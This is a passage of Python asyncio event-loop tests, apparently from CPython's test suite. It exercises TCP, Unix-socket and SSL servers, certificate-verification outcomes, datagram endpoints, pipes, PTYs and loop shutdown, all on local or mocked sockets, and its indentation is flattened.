server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
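# Everything network-facing is mocked in the next test: getaddrinfo()
# resolves each host to itself, the socket module used by base_events is
# replaced so getsockname() reports the fake hosts, and _start_serving/
# _stop_serving are stubbed out, so create_server() can be checked
# without binding any real sockets.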
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards, to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards, to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards, to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards, to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertLessEqual(try_count, 5)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
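# The first parameter is named 'inner_self' so that the enclosing test
# method's 'self' remains visible inside the closure and the protocol
# can be constructed with the test's loop.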
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# the client got back b'resp:xxx' (8 bytes)
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except OSError:
pass
else:
break
else:
assert False, 'Cannot create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
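# A selector event loop owns one internal socketpair (the self-pipe,
# _ssock/_csock) used by call_soon_threadsafe() and the signal wakeup fd;
# that pair is what _internal_fds counts, and close() must release it.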
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but passes on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
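# On proactor (IOCP) loops the future returned by sock_recv() carries its
# pending Overlapped object as 'ov'; selector loops have no such
# attribute, hence the getattr() below. The elapsed-time bound checks
# that cancelling the future wakes the loop promptly instead of waiting
# out the poll timeout.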
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
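# Guards against busy-spinning on sub-resolution timeouts: each sleep()
# should cost roughly two _run_once() passes (one poll that waits out the
# timer, one that runs the callback), so five sleeps plus task startup and
# teardown gives the ideal count of 12. A selector that keeps waking up
# before the deadline would inflate the counter far past the limit of 20.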
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of calls is 12, but on some platforms the selector
# may sleep a little less than the timeout, depending on the resolution
# of the clock used by the kernel. Tolerate a few extra calls on these
# platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
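# Return-code convention matches subprocess.Popen: on POSIX a child killed
# by a signal reports -signum, while Windows has no signals and only
# guarantees an integer exit status.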
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
